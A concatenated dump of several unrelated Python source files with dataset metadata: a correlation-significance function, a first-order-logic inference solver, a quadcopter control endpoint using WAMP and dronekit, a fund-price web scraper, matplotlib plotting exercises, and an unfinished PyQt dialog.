of pearson\n correlation coefficients between the two prediction systems\n of interest.\n N: (int) length of original time series being correlated.\n ci: (optional int) confidence level for z-statistic test\n\n Returns:\n Boolean array of same dimensions as input where True means r1 is\n significantly different from r2 at ci.\n\n Reference:\n https://www.statisticssolutions.com/comparing-correlation-coefficients/\n \"\"\"\n def _r_to_z(r):\n \"\"\"Fisher's r to z transformation\"\"\"\n return 0.5 * (np.log(1 + r) - np.log(1 - r))\n\n z1, z2 = _r_to_z(r1), _r_to_z(r2)\n difference = np.abs(z1 - z2)\n zo = difference / (np.sqrt(2*(1 / (N - 3))))\n confidence = np.zeros_like(zo)\n confidence[:] = _z_score(ci)\n sig = xr.DataArray(zo > confidence)\n return sig\n","sub_path":"climpred/stats.py","file_name":"stats.py","file_ext":"py","file_size_in_byte":16950,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"63"} +{"seq_id":"51375711","text":"# imports \nimport argparse\nimport re\nfrom copy import deepcopy\n\noutput = open(\"output.txt\", \"w\")\n\nclass Predicate:\n \n def __init__(self, name, nargs):\n self.name = name\n self.nargs = nargs\n self.negation = False\n self.vargs = []\n \n def isNegation(self):\n return self.negation\n\nclass Clause:\n \n def __init__(self, fact=False):\n self.lhs = []\n self.rhs = None\n self.fact = fact\n \n def addLhs(self, predicate):\n self.lhs.append(predicate)\n return\n \n def addRhs(self, predicate):\n self.rhs = predicate\n return\n\n def isFact(self):\n return self.fact\n\ndef printToOutput(qoa, query):\n ostr = query.name + \"(\"\n if query.vargs[0][0].islower():\n ostr = ostr + \"_\"\n else:\n ostr = ostr + query.vargs[0]\n for i in range(1, query.nargs):\n if query.vargs[i][0].islower():\n ostr = ostr + \", \" + \"_\"\n else:\n ostr = ostr + \", \" + query.vargs[i]\n ostr = ostr + \")\\n\" \n output.write(qoa + \": \" + ostr)\n\n\ndef fol_ask_query(clauses, query):\n for resQuery in fol_or(clauses, query):\n if resQuery == None:\n printToOutput(str(False), query)\n return False\n else:\n printToOutput(str(True), resQuery)\n return True\n printToOutput(str(False), query)\n return False\n \ndef fol_ask(clauses, queries):\n \n for query in queries:\n if fol_ask_query(clauses, query) == False:\n return False\n \n return True\n\n\ndef fol_or_reverted(matchedClauses, index, query):\n \n return\n\ndef fol_or(origClauses, query):\n clauses = deepcopy(origClauses)\n matchedClauses = match_clauses(clauses, query)\n origQuery = deepcopy(query)\n if len(matchedClauses) == 0:\n printToOutput(\"Ask\", query)\n yield None\n for clause in matchedClauses:\n printToOutput(\"Ask\", query)\n # clause is fact\n if clause.isFact() == True:\n #isSubstituted = False\n subMap = {}\n ret = True\n newQuery = deepcopy(query)\n if clause.rhs.nargs == query.nargs and clause.rhs.vargs != query.vargs:\n for i in range(clause.rhs.nargs):\n if clause.rhs.vargs[i] != query.vargs[i] and query.vargs[i][0].islower():\n subMap[query.vargs[i]] = clause.rhs.vargs[i]\n #isSubstituted = True\n elif clause.rhs.vargs[i] != query.vargs[i] and query.vargs[i][0].isupper():\n ret = False\n if ret == False:\n continue\n \n for i in range(newQuery.nargs):\n if newQuery.vargs[i] in subMap.keys():\n newQuery.vargs[i] = subMap[query.vargs[i]]\n #return ret, isSubstituted, query\n yield newQuery\n # clause is => : have to perform and search\n else:\n copyClause = deepcopy(clause)\n copyQuery = deepcopy(query)\n unify(copyQuery, copyClause)\n for subMapA in 
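# A minimal standalone sketch of the z_significance statistic defined above,
# with made-up sample values; the fisher_z helper name is illustrative, not
# part of climpred:
import numpy as np
from scipy.stats import norm

def fisher_z(r):
    # Fisher's r-to-z transform: 0.5 * log((1 + r) / (1 - r)) == arctanh(r)
    return np.arctanh(r)

r1, r2, N, ci = 0.75, 0.45, 30, 90  # two ACC skills, each from N samples
z_stat = abs(fisher_z(r1) - fisher_z(r2)) / np.sqrt(2 * (1 / (N - 3)))
z_crit = norm.ppf((100 - (100 - ci) / 2) / 100)  # same value as _z_score(ci)
print(z_stat > z_crit)  # True: r1 differs significantly from r2 at ci=90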
fol_and(copyClause.lhs, origClauses):\n# if subMapA == None:\n# query = deepcopy(origQuery)\n# break\n# else:\n# substituteRHS(copyClause.rhs, subMapA)\n# if equals(query, copyClause.rhs):\n# substituteQuery(copyClause.rhs, query)\n# #return True, True, query\n# yield query\n if subMapA != None:\n newCopyClause = deepcopy(copyClause)\n substituteRHS(newCopyClause.rhs, subMapA)\n if equals(query, newCopyClause.rhs):\n newQuery = deepcopy(query)\n substituteQuery(newCopyClause.rhs, newQuery)\n #return True, True, query\n yield newQuery\n else:\n query = deepcopy(origQuery)\n break\n #if resGot == False:\n # query = deepcopy(origQuery)\n \n #yield None\n return \n #return False, False, query\n\ndef substituteQuery(rhs, query):\n for i in range(query.nargs):\n if query.vargs[i][0].islower() and rhs.vargs[i][0].isupper():\n query.vargs[i] = rhs.vargs[i]\n return\n\ndef equals(query, rhs):\n for j in range(rhs.nargs):\n if rhs.vargs[j] != query.vargs[j]:\n if rhs.vargs[j].isupper() and query.vargs[j].isupper():\n return False\n return True\n \n\ndef fol_and(lhsQueriesOrig, origClauses):\n subMapForAnd = {}\n if len(lhsQueriesOrig) == 0:\n yield subMapForAnd\n else:\n lhsQueries = deepcopy(lhsQueriesOrig)\n firstQuery = lhsQueries[0]\n restAll = lhsQueries[1:]\n oldQuery = deepcopy(firstQuery)\n for resQuery in fol_or(origClauses, firstQuery):\n if resQuery == None:\n printToOutput(\"False\", firstQuery)\n yield None\n return\n else:\n printToOutput(\"True\", resQuery)\n restAllCopy = deepcopy(restAll)\n subMap = substituteLHS(restAllCopy, oldQuery, resQuery)\n subMapForAnd.update(subMap)\n for subMapO in fol_and(restAllCopy, origClauses):\n if subMapO != None and len(subMapO) > 0:\n subMapForAnd.update(subMapO)\n if subMapO == None:\n firstQuery = deepcopy(oldQuery)\n break\n yield subMapForAnd\n \n #yield subMapForAnd\n yield None\n return \n\ndef substituteRHS(rhs, subMapA):\n for j in range(rhs.nargs):\n if rhs.vargs[j] in subMapA.keys():\n rhs.vargs[j] = subMapA[rhs.vargs[j]]\n\ndef substituteLHS(lhsQueries, oldQuery, query):\n \n subMap = {}\n for i in range(oldQuery.nargs):\n if oldQuery.vargs[i][0].islower() and query.vargs[i][0].isupper():\n subMap[oldQuery.vargs[i]] = query.vargs[i]\n \n for pred in lhsQueries:\n for j in range(pred.nargs):\n if pred.vargs[j] in subMap.keys():\n pred.vargs[j] = subMap[pred.vargs[j]]\n \n return subMap\n\ndef unify(query, clause):\n varMap = {}\n for i in range(query.nargs):\n if query.vargs[i][0].isupper() and clause.rhs.vargs[i][0].islower():\n varMap[clause.rhs.vargs[i]] = query.vargs[i]\n clause.rhs.vargs[i] = query.vargs[i]\n \n for pred in clause.lhs:\n for j in range(pred.nargs):\n if pred.vargs[j] in varMap.keys():\n pred.vargs[j] = varMap[pred.vargs[j]]\n \n return query, clause\n\ndef match_clauses(clauses, query):\n matchedClauses = []\n for clause in clauses:\n rhsClause = clause.rhs\n if rhsClause.name == query.name:\n add = True\n for i in range(rhsClause.nargs):\n if rhsClause.vargs[i][0].isupper() and query.vargs[i][0].isupper() and rhsClause.vargs[i] != query.vargs[i]:\n add = False\n if add:\n matchedClauses.append(clause)\n return matchedClauses\n\ndef extractQueries(queryStr):\n \n queries = queryStr.split('&&')\n queryPreds = []\n for i in range(len(queries)):\n qStr = queries[i].strip(' \\t\\n\\r')\n qReg = re.compile(r'(.*)\\((.*)\\)')\n qu = qReg.search(qStr)\n predName = qu.group(1).strip(' \\t\\n\\r')\n predVar = qu.group(2).strip(' \\t\\n\\r').split(',')\n pred = Predicate(predName, len(predVar))\n for j in 
range(len(predVar)):\n pred.vargs.append(predVar[j].strip(' \\t\\n\\r'))\n queryPreds.append(pred)\n \n return queryPreds\n\ndef parseLHS(lhsStr, clause):\n lhsClauses = lhsStr.split('&&')\n for cStr in lhsClauses:\n cStr = cStr.strip(' \\t\\n\\r')\n cReg = re.compile(r'(.*)\\((.*)\\)')\n factStr = cReg.search(cStr)\n predName = factStr.group(1).strip(' \\t\\n\\r')\n predVar = factStr.group(2).strip(' \\t\\n\\r').split(',')\n if predName[0] == '~':\n pred = Predicate(predName[1:], len(predVar))\n pred.negation = True\n else:\n pred = Predicate(predName, len(predVar))\n for j in range(len(predVar)):\n pred.vargs.append(predVar[j].strip(' \\t\\n\\r'))\n clause.addLhs(pred)\n return\n\ndef parseRHS(rhsStr, clause):\n cReg = re.compile(r'(.*)\\((.*)\\)')\n factStr = cReg.search(rhsStr)\n predName = factStr.group(1).strip(' \\t\\n\\r')\n predVar = factStr.group(2).strip(' \\t\\n\\r').split(',')\n if predName[0] == '~':\n pred = Predicate(predName[1:], len(predVar))\n pred.negation = True\n else:\n pred = Predicate(predName, len(predVar))\n for j in range(len(predVar)):\n pred.vargs.append(predVar[j].strip(' \\t\\n\\r'))\n clause.addRhs(pred)\n return\n\n# main\nif __name__ == \"__main__\":\n clauses = []\n queries = []\n parser = argparse.ArgumentParser()\n parser.add_argument('-i', required=True)\n args = parser.parse_args()\n inFile = args.i\n inF = open(inFile, 'r')\n dataLines = inF.readlines()\n queries = extractQueries(dataLines[0])\n numClauses = int(dataLines[1])\n for i in range(0, numClauses):\n clauseStr = dataLines[2+i].strip(' \\t\\n\\r').split('=>')\n if len(clauseStr) == 2:\n clause = Clause()\n parseLHS(clauseStr[0].strip(' \\t\\n\\r'), clause)\n parseRHS(clauseStr[1].strip(' \\t\\n\\r'), clause)\n clauses.append(clause)\n else:\n clause = Clause(fact=True)\n parseRHS(clauseStr[0], clause)\n clauses.append(clause)\n \n ret = fol_ask(clauses, queries)\n output.write(str(ret))\n ","sub_path":"Assignment_2/hw2cs561s16.py","file_name":"hw2cs561s16.py","file_ext":"py","file_size_in_byte":9948,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"63"} +{"seq_id":"74145524","text":"import sys\n# .ntps to .obj\ndef ntps2obj(ntps_file, obj_file):\n with open(ntps_file) as f_in:\n f_out = open(obj_file, 'w')\n for line in f_in:\n xyz_list = line.split(' ')\n f_out.write('v '+line)\n\nif len(sys.argv) < 3:\n print(\"npts to obj:\\nformat_scripts xxx.npts xxx.obj\")\n exit\nntps2obj(sys.argv[1], sys.argv[2])","sub_path":"PythonScript/format_scripts.py","file_name":"format_scripts.py","file_ext":"py","file_size_in_byte":357,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"63"} +{"seq_id":"536868856","text":"# Periscope Quadcopter WAMP Endpoint\n# Evan Widloski - 2017-07-21\n\n#FIXME - script cant handle a pixhawk reset\n#FIXME - script only tries to connect to pixhawk once at startup\nimport sys\n\nfrom twisted.python import log as twisted_log\nfrom twisted.logger import Logger, textFileLogObserver\nfrom twisted.internet.defer import inlineCallbacks\nfrom twisted.internet import task\nfrom zope.interface import provider\nimport logging\nimport sys\n\nfrom autobahn.twisted.util import sleep\nfrom autobahn.twisted.wamp import ApplicationSession\nfrom autobahn.wamp.exception import ApplicationError\nfrom socket import error as SocketError\nfrom autobahn import wamp\nfrom dronekit import connect, VehicleMode\nfrom dronekit.lib import APIException\nfrom pymavlink import mavutil\n\nfrom movements import 
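# The solver above reads its knowledge base from a file: queries on line 1
# (joined with '&&'), a clause count on line 2, then one fact or implication
# per line with '=>' before the head. Tokens starting lowercase are variables,
# uppercase are constants. A hypothetical input.txt in that dialect, run as
# python hw2cs561s16.py -i input.txt:
sample_input = """Criminal(West)
3
American(West)
Sells(West, M1, Nono)
American(x) && Sells(x, y, z) => Criminal(x)
"""
# fol_or matches Criminal(West) against the implication's head, unify() binds
# x to West, and fol_and then proves each left-hand predicate in turn.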
goto_position_target_body_offset_ned, goto_position_target_local_ned\n\n\nlog = Logger()\n# observer = textFileLogObserver(sys.stdout)\n# log.observer.addObserver(observer)\n\n\n# try to connect to pixhawk different ways\nconnections = []\nconnections.append('tcp:localhost:14550')\n\nserial_connections = mavutil.auto_detect_serial(preferred_list=['*FTDI*',\n \"*Arduino_Mega_2560*\",\n \"*3D_Robotics*\",\n \"*USB_to_UART*\",\n '*PX4*',\n '*FMU*'])\nif len(serial_connections) > 0:\n connections.append(str(serial_connections[0]))\n\nfor connection in connections:\n log.info(\"Trying to connect to {}\".format(connection))\n try:\n vehicle = connect(connection, heartbeat_timeout=600)\n log.info(\"Connection to {} succeeded\".format(connection))\n print('connected')\n break\n except Exception as e:\n log.info(\"Connection to {} failed\".format(str(connection)))\nelse:\n log.error(\"Could not connect!\")\n sys.exit(1)\n\nlog.info(\"connected to pixhawk\")\n\nclass QuadcopterSession(ApplicationSession):\n\n\n def __init__(self, *args, **kwargs):\n super(QuadcopterSession, self).__init__(*args, **kwargs)\n self.last_alt = None\n\n\n # ------------------- PUB/SUB ----------------------\n def publish_messages(self, event):\n #FIXME event dicts coming from twisted's logging system are formatted\n # differently depending on whether the message comes from mavlink or\n # this code\n # with open('/tmp/test', 'a') as f:\n # f.write(str(event))\n # f.write('\\n\\n')\n\n print(event)\n # tracebacks\n if 'traceback' in event:\n message = event['traceback']\n # system messages\n if 'message' in event:\n message = event['message']\n # mavlink messages\n elif 'log_io' in event:\n message = event['log_io']\n # log messages\n elif 'log_format' in event:\n message = event['log_format']\n\n self.publish(u'com.quadcopter.messages', message)\n\n # publish changes of flight mode\n def publish_mode(self, vehicle, attr_name, mode):\n self.log.info(\"published mode {}\".format(mode.name))\n self.publish(u'com.quadcopter.mode', mode.name)\n\n # publish changes of num satellites\n def publish_satellites(self, vehicle, attr_name, gps_0):\n self.log.info(\"published satellites {}\".format(gps_0.satellites_visible))\n self.publish(u'com.quadcopter.satellites', gps_0.satellites_visible)\n\n # publish changes of alt in global_relative_frame\n def publish_altitude(self, vehicle, attr_name, global_relative_frame):\n if not global_relative_frame.alt == self.last_alt:\n self.log.info(\"published altitude {}\".format(global_relative_frame.alt))\n self.publish(u'com.quadcopter.altitude', global_relative_frame.alt)\n self.last_alt = global_relative_frame.alt\n\n # publish changes of armed status\n def publish_armed(self, vehicle, attr_name, armed):\n self.log.info(\"published armed {}\".format(armed))\n self.publish(u'com.quadcopter.armed', armed)\n\n\n # ------------------- RPC ----------------------\n\n # translate vehicle in cardinal directions\n def set_translate(self, direction):\n self.log.info(\"moving {}\".format(direction))\n # set vehicle mode\n def set_mode(self, mode):\n self.log.info(\"Changing mode to {}\".format(mode))\n vehicle.mode = VehicleMode(mode)\n # arm or disarm vehicle\n def set_armed(self, armed):\n self.log.info(\"setting armed to {}\".format(armed))\n vehicle.armed = armed\n\n # takeoff to `altitude` meters\n def set_takeoff(self, altitude):\n self.log.info(\"taking off\")\n vehicle.simple_takeoff(altitude)\n\n # go to altitude\n def set_altitude(self, altitude):\n self.log.info(\"going to altitude 
{}\".format(altitude))\n goto_position_target_local_ned(vehicle, 0, 0, -float(altitude))\n\n # go to relative altitude\n def set_altitude_relative(self, altitude):\n self.log.info(\"adjusting altitude by {}\".format(altitude))\n goto_position_target_body_offset_ned(vehicle, 0, 0, -float(altitude))\n\n\n @inlineCallbacks\n def onJoin(self, details):\n\n # start sending log messages\n log.observer.addObserver(self.publish_messages)\n\n # publish session id so clients know which session is the quadcopter\n yield self.log.info(\"published session id\")\n yield self.publish(u'com.quadcopter.session_id', details.session)\n\n # try connecting to pixhawk, set up publications\n try:\n self.log.info(\"published pixhawk_connection True\")\n self.publish(u'com.quadcopter.pixhawk_connection', True)\n\n # set up publications to trigger on attribute change, immediately publish an event\n vehicle.add_attribute_listener('mode', self.publish_mode)\n self.publish_mode(None, None, vehicle.mode)\n\n vehicle.add_attribute_listener('gps_0.satellites_visible', self.publish_satellites)\n self.publish_satellites(None, None, vehicle.gps_0)\n\n vehicle.add_attribute_listener('location.global_relative_frame', self.publish_altitude)\n self.publish_altitude(None, None, vehicle.location.global_relative_frame)\n\n vehicle.add_attribute_listener('armed', self.publish_armed)\n self.publish_armed(None, None, vehicle.armed)\n\n # if connection fails, try again in 5 seconds\n except SocketError as e:\n self.log.info(\"could not connect to pixhawk (errno {}), trying again\".format(e.errno))\n # register RPCs\n yield self.register(self.set_translate, u'com.quadcopter.set_translate')\n yield self.register(self.set_mode, u'com.quadcopter.set_mode')\n yield self.register(self.set_armed, u'com.quadcopter.set_armed')\n yield self.register(self.set_takeoff, u'com.quadcopter.set_takeoff')\n yield self.register(self.set_altitude, u'com.quadcopter.set_altitude')\n yield self.register(self.set_altitude_relative, u'com.quadcopter.set_altitude_relative')\n\n def onClose(self, *args):\n # remove attribute listeners\n vehicle.remove_attribute_listener('mode', self.publish_mode)\n vehicle.remove_attribute_listener('gps_0.satellites_visible', self.publish_satellites)\n vehicle.remove_attribute_listener('location.global_relative_frame', self.publish_altitude)\n vehicle.remove_attribute_listener('armed', self.publish_armed)\n log.observer.removeObserver(self.publish_messages)\n\nfrom autobahn.twisted.wamp import ApplicationRunner\n\n# runner = ApplicationRunner(url=u\"ws://localhost:8080/ws\", realm=u\"realm1\", retry_delay_growth=10, initial_retry_delay=5, max_retries=-1, retry_delay_jitter=2)\nrunner = ApplicationRunner(url=u\"ws://localhost:8080/ws\", realm=u\"realm1\")\nrunner.run(QuadcopterSession, auto_reconnect=True)\n","sub_path":"controls/vehicle/wamp.py","file_name":"wamp.py","file_ext":"py","file_size_in_byte":7990,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"63"} +{"seq_id":"492520819","text":"#!/bin/python2.7\n#########################################\n##Import needed libraries\n#########################################\nimport time #To be able to sleep\nimport requests\nfrom bs4 import BeautifulSoup\nfrom datetime import datetime\nimport codecs #To be able to write the file\nfrom local_paths import output\nfrom local_paths import output_error\nfrom local_paths import input\n\n\n#########################################\n##Static paths and 
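# A counterpart client can drive the endpoint above through its registered
# procedures and subscriptions. A minimal sketch with autobahn -- the topic
# and procedure URIs are the ones registered above; the GroundStation class
# name and the takeoff altitude are illustrative:
from twisted.internet.defer import inlineCallbacks
from autobahn.twisted.wamp import ApplicationSession, ApplicationRunner

class GroundStation(ApplicationSession):
    @inlineCallbacks
    def onJoin(self, details):
        # watch altitude updates published by the quadcopter endpoint
        yield self.subscribe(lambda alt: print("altitude:", alt),
                             u'com.quadcopter.altitude')
        # switch to guided flight, arm, and take off to 10 m via the RPCs
        yield self.call(u'com.quadcopter.set_mode', 'GUIDED')
        yield self.call(u'com.quadcopter.set_armed', True)
        yield self.call(u'com.quadcopter.set_takeoff', 10)

ApplicationRunner(url=u"ws://localhost:8080/ws", realm=u"realm1").run(GroundStation)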
variables\n#########################################\nstatic1 = \"https://secust.msse.se/se/nordnetny/funds/overview.aspx?cid=\"\nstatic2 = \"&cntry=SE\"\nvDate = datetime.now().strftime(\"%Y-%m-%d\")\n\n\n#########################################\n## Create empty file so we can write to it later\n#########################################\nNordnet_Nav = codecs.open(output + '/' + 'Nav' + vDate + '.txt', 'w', 'utf-8')\ntexttowrite = 'ID@NAV@NAVDATE'\nNordnet_Nav.write(texttowrite + '\\r\\n')\n\n#########################################\n# Funds with errors\n#########################################\nErrorID = codecs.open(output_error + '/' + 'Error' + vDate + '.txt', 'w', 'utf-8')\ntexttowrite = 'ID@ERROR'\nErrorID.write(texttowrite + '\\r\\n')\n\n\n#########################################\n## Get IDs to read\n#########################################\nwith codecs.open(input + '/' + 'ID.txt', 'r', encoding='utf-8') as Funds:\n\tfor Fund in Funds:\n\t\tFund2 = Fund.strip()\n\t\tres = requests.get(static1 + Fund2 + static2)\n\t\ttry:\n\t\t\tsoup = BeautifulSoup(res.content, 'lxml')\n\t\t\ttable = soup.find('table', {\"id\" : \"Table1\"})\n\t\t\tNav = table.find_all('td')[3].text\n\t\t\tPreNavDate = table.find_all('td')[5].text\n\t\t\tNavDate = PreNavDate.strip()\n################################################\n## Write to file\n################################################\n\t\t\tNordnet_Nav.write(\"%s\" %Fund2 + \"@\" + \"%s\" %Nav + \"@\" \"%s\" %NavDate + '\\r\\n')\n\t\texcept Exception as e:\n\t\t\tErrorID.write(\"%s\" % Fund2 + \"@\" + \"%s\" % str(e) + '\\r\\n')\n","sub_path":"Nordnet_GetNav_BS.py","file_name":"Nordnet_GetNav_BS.py","file_ext":"py","file_size_in_byte":1942,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"63"} +{"seq_id":"61093540","text":"import numpy as np\r\nimport sys\r\nimport matplotlib.pyplot as plt\r\n\r\n#Plot curve\r\nx = np.linspace(0,4*np.pi,100)\r\ny = np.sin(x)\r\nplt.plot(x,y)\r\nplt.show()\r\n\r\n#Marker\r\n# x = np.linspace(0,4*np.pi,100)\r\n# y = np.sin(x)\r\n# plt.plot(x,y)\r\n# plt.plot(x,y,'-^') # adding triangle markers\r\n# plt.plot(x,y,'-o') # adding circle markers\r\n# plt.show()\r\n\r\n\r\n#Line Style\r\n# x = np.linspace(0,4*np.pi,100)\r\n# y = np.sin(x)\r\n# plt.plot(x,y,'--')\r\n# plt.show()\r\n\r\n#color\r\n# x = np.linspace(0,4*np.pi,100)\r\n# y = np.sin(x)\r\n# plt.plot(x,y,'g')\r\n# plt.show()\r\n\r\n#grid line\r\nx = np.linspace(0,4*np.pi,100)\r\ny = np.sin(x)\r\nplt.plot(x,y,'g')\r\nplt.grid()\r\nplt.show()\r\n\r\n#label\r\n# x = np.linspace(0,4*np.pi,100)\r\n# y = np.sin(x)\r\n# plt.plot(x,y,'g')\r\n# plt.xlabel('x')\r\n# plt.ylabel('y')\r\n# plt.title('A sine curve')\r\n# plt.axis([0,4*np.pi,-2,2])\r\n# plt.show()\r\n\r\n\r\n#Overlay Plots and Legend\r\n# x = np.linspace(0,4*np.pi,100)\r\n# y = np.sin(x)\r\n# y1= np.cos(x)\r\n# plt.plot(x,y,'c',label='y=sin(x)')\r\n# plt.plot(x,y1,'y',label='y=cos(x)')\r\n# plt.legend(loc='upper left')\r\n# plt.show()\r\n\r\n\r\n\r\n#subplot\r\n# x = np.linspace(0,4*np.pi,100)\r\n# y = np.sin(x)\r\n# y1= np.cos(x)\r\n# plt.subplot(2,1,1)\r\n# plt.plot(x,y,'c',label='y=sin(x)')\r\n# plt.legend(loc='upper left')\r\n# plt.subplot(2,1,2)\r\n# plt.plot(x,y1,'y',label='y=cos(x)')\r\n# plt.legend(loc='upper left')\r\n# plt.show()\r\n\r\n#-------------------------------\r\n#challenge\r\n\r\n# x = np.linspace(0,4*np.pi,100)\r\n# y = np.sin(x)\r\n# y2 = np.cos(x)\r\n# y3 = np.sin(x) * np.cos(x)\r\n# y4 = np.sin(x)- np.cos(x)\r\n\r\n# plt.subplot(2,2,1)\r\n# 
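# The NAV extraction above indexes fixed cells of "Table1". A quick
# standalone check of that pattern -- the HTML here is fabricated for
# illustration, not Nordnet's real markup:
from bs4 import BeautifulSoup

html = """<table id="Table1">
<tr><td>Fund</td><td>x</td><td>NAV</td><td>123.45</td><td>Date</td><td> 2017-01-02 </td></tr>
</table>"""
table = BeautifulSoup(html, 'lxml').find('table', {"id": "Table1"})
nav = table.find_all('td')[3].text               # '123.45'
nav_date = table.find_all('td')[5].text.strip()  # '2017-01-02'
print(nav, nav_date)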
plt.plot(x,y,'r',label='y=sin(x)')\r\n# plt.legend(loc='upper left')\r\n# plt.subplot(2,2,2)\r\n# plt.plot(x,y2,'y',label='y=cos(x)')\r\n# plt.legend(loc='upper left')\r\n# plt.subplot(2,2,3)\r\n# plt.plot(x,y3,'g',label='y=sin(x) * cos(x)')\r\n# plt.legend(loc='upper left')\r\n# plt.subplot(2,2,4)\r\n# plt.plot(x,y4,'b',label='y=cos(x) - sin(x)')\r\n# plt.legend(loc='upper left')\r\n# plt.subplots_adjust(wspace=0.6, hspace=0.6, left=0.1, bottom=0.22, right=0.96, top=0.96)\r\n# plt.show()\r\n\r\n#---------------------------------\r\n# x = np.linspace(0,4*np.pi,100)\r\n# y = np.sin(x)\r\n# y2 = np.cos(x)\r\n# y3 = np.sin(x) * np.cos(x)\r\n# y4 = np.sin(x)- np.cos(x)\r\n\r\n# plt.subplot(2,2,1)\r\n# plt.plot(x,y,'r')\r\n# plt.subplot(2,2,2)\r\n# plt.plot(x,y2,'y')\r\n# plt.subplot(2,2,3)\r\n# plt.plot(x,y3,'g')\r\n# plt.subplot(2,2,4)\r\n# plt.plot(x,y4,'b')\r\n\r\n# plt.legend(loc='upper left')\r\n# plt.show()\r\n\r\n\r\n\r\n#-----------------------------------------------------\r\n#Examples\r\n# def plot5():\r\n# data = [ (1, 0), (2, 0.1 ), (3, 1.1), (4, 1.2), (5, 2.3), \r\n# (6, 3.5), (7, 5.8) ]\r\n# X = [ x for (x,y) in data ]\r\n# Y = [ y for (x,y) in data ]\r\n# #print X\r\n# #print Y\r\n# plt.plot( X, Y, ':rs' )\r\n# plt.axis( [0, 8, 0, 6])\r\n# plt.xlabel( \"X values\" )\r\n# plt.ylabel( \"Y values\" )\r\n# plt.show()\r\n\r\n# plot5()\r\n\r\n\r\n#------------------------------------------------------\r\n# #Scatter Plot\r\n# x = np.arange(1, 51)\r\n# print(x)\r\n# y = np.random.rand(50) \r\n# print(y)\r\n\r\n# plt.scatter(x,y)\r\n# plt.show()\r\n#--------------------------------------------------\r\n#Bar Plot\r\ndata = [ (\"data1\", 34), (\"data2\", 22),\r\n (\"data3\", 11), ( \"data4\", 28),\r\n (\"data5\", 57), ( \"data6\", 39),\r\n (\"data7\", 23), ( \"data8\", 98)]\r\nN = len( data )\r\nx = np.arange(1, N+1)\r\ny = [ num for (s, num) in data ]\r\nlabels = [ s for (s, num) in data ]\r\nwidth = 1\r\nbar1 = plt.bar( x, y, width, color=\"y\" )\r\nplt.ylabel( 'Intensity' )\r\nplt.xticks(x + width/2.0, labels )\r\nplt.show()\r\n\r\n#------------------------------------------\r\n#Contour Plot\r\n# x = np.linspace(-1,1,255)\r\n# y = np.linspace(-2,2,300)\r\n# X, Y = np.meshgrid(x, y)\r\n# z = np.sin(X)*np.cos(Y)\r\n# plt.contour(X,Y,z,255)\r\n# plt.show()\r\n#-------------------------------------\r\n\r\n#Hisotgram\r\n# import matplotlib.pyplot as plt\r\n# import numpy as np\r\n# gaussian_numbers = np.random.normal(size=10000)\r\n# print(gaussian_numbers)\r\n# plt.hist(gaussian_numbers)\r\n# plt.title(\"Gaussian Histogram\")\r\n# plt.xlabel(\"Value\")\r\n# plt.ylabel(\"Frequency\")\r\n# plt.show()\r\n\r\n\r\n#----------------------------------------------\r\n# #Pie chart\r\n# print (sys.version)\r\n# x = np.linspace(0,4*np.pi,10)\r\n# plt.pie(x)\r\n# plt.show()","sub_path":"Examples -Students/Module12-Numpy/matplotlibEx.py","file_name":"matplotlibEx.py","file_ext":"py","file_size_in_byte":4198,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"63"} +{"seq_id":"277728623","text":"import numpy as np\nfrom ploos import checkableComboBox\nfrom PyQt5.QtCore import *\nfrom PyQt5.QtGui import *\nfrom PyQt5.QtWidgets import *\n\n\nclass Ui_Dialog(object):\n def setupUi(self, Dialog, canvas):\n self.canvas = canvas\n self.doscar = canvas.doscar[0]\n self.axn = 0\n self.linecounter = 0\n if not Dialog.objectName():\n Dialog.setObjectName(u\"Projector\")\n Dialog.resize(402, 368)\n self.horizontalLayout_3 = QHBoxLayout(Dialog)\n 
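# One note on the bar-plot recipe above: plt.bar left-aligned bars in old
# matplotlib releases, hence the x + width/2.0 offset passed to xticks. On
# matplotlib >= 2.0 bars are center-aligned, so the same chart reduces to
# the sketch below (data trimmed for brevity):
import numpy as np
import matplotlib.pyplot as plt

data = [("data1", 34), ("data2", 22), ("data3", 11), ("data4", 28)]
x = np.arange(1, len(data) + 1)
y = [num for (_, num) in data]
labels = [s for (s, _) in data]
plt.bar(x, y, color="y", tick_label=labels)  # bars centered on x by default
plt.ylabel('Intensity')
plt.show()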
self.horizontalLayout_3.setObjectName(u\"horizontalLayout_3\")\n self.verticalLayout_2 = QVBoxLayout()\n self.verticalLayout_2.setObjectName(u\"verticalLayout_2\")\n self.verticalLayout_2.setSizeConstraint(QLayout.SetMaximumSize)\n self.label_ax = QLabel(Dialog)\n self.label_ax.setObjectName(u\"label_ax\")\n self.verticalLayout_2.addWidget(self.label_ax)\n self.horizontalLayout = QHBoxLayout()\n self.horizontalLayout.setObjectName(u\"horizontalLayout\")\n self.label = QLabel(Dialog)\n self.label.setObjectName(u\"label\")\n\n self.horizontalLayout.addWidget(self.label)\n\n# self.spinBox = QSpinBox(Dialog)\n# self.spinBox.setObjectName(u\"spinBox\")\n# self.spinBox.setRange(1, doscar.natoms)\n#\n# self.horizontalLayout.addWidget(self.spinBox)\n#\n# self.horizontalSpacer = QSpacerItem(60, 40, QSizePolicy.Preferred, QSizePolicy.Minimum)\n#\n# self.horizontalLayout.addItem(self.horizontalSpacer)\n#\n# self.label_2 = QLabel(Dialog)\n# self.label_2.setObjectName(u\"label_2\")\n#\n# self.horizontalLayout.addWidget(self.label_2)\n#\n# self.spinBox_2 = QSpinBox(Dialog)\n# self.spinBox_2.setObjectName(u\"spinBox_2\")\n# self.spinBox_2.setRange(1, doscar.natoms)\n#\n# self.horizontalLayout.addWidget(self.spinBox_2)\n\n\n# self.verticalLayout_2.addLayout(self.horizontalLayout)\n self.axis = checkableComboBox.CheckableComboBox(Dialog) \n if canvas.compare:\n self.axis.addItems( [ str(i) for i,x in enumerate(canvas.axes) ] )\n self.verticalLayout_2.addWidget(self.axis)\n self.loadDoscar = QPushButton(Dialog)\n self.loadDoscar.setObjectName(u\"loadDoscar\")\n self.loadDoscar.clicked.connect(self.load)\n self.verticalLayout_2.addWidget(self.loadDoscar)\n\n self.label_3 = QLabel(Dialog)\n self.label_3.setObjectName(u\"label_3\")\n self.verticalLayout_2.addWidget(self.label_3)\n self.atoms = checkableComboBox.CheckableComboBox(Dialog) \n 